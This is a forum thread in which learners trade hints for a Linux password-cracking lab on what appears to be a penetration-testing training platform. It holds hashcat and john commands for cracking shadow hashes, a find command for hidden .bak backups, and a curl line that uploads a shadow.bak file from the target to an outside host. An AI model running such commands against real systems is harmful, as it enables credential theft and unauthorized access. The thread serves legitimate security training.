Hello everyone,
i am stuck in this LAB
what i did?
- muted the password-list with custom rules
- tried to find WILL user Password → did not work
- crackmapexec ssh…
- hydra
If you’ve done previous modules, then you already have Will’s password
Hint for getting root: just use mut password list, do not change it somehow
It cracked it like in 4 secs
hashcat --force Downloads/password.list -r Downloads/custom.rule --stdout | sort -u > mutated-passwords
john hashes --wordlist=mutated-passwords
1 Like
W dude. Thanks!
Thanks a ton!! always defaulting to rockyou 
i think this lab has an issue
kira@nix01:/home/will/.backups$ curl -X POST https://10.10.15.125/upload -F ‘files=@shadow.bak’ --insecure
curl: (26) Failed to open/read local data from file/application
Thanks easy peasy
ssh into will
find the hidden file .backup
one of the files has the root hash
copy the path
and run hashcat on your local machine and use one of the mutated pw from the resource provided folder
hashcat -m 1800 -a 0 hash mut_password.list
if You get all the process right don’t use Hashcat use another cracking tools
This was a tough one for me!
You can find backups of passwd and shadow in a hidden location. The following command can be of help:
find / -name *.bak 2>/dev/null
Afterwards export the files to your Attackbox and follow the " Cracking Linux Credentials" part of this chapter. Remember that there is a passwordlist provided and we learned some lessons before how to craft a mutated list 
no need for rockyou.txt
gl and happy hacking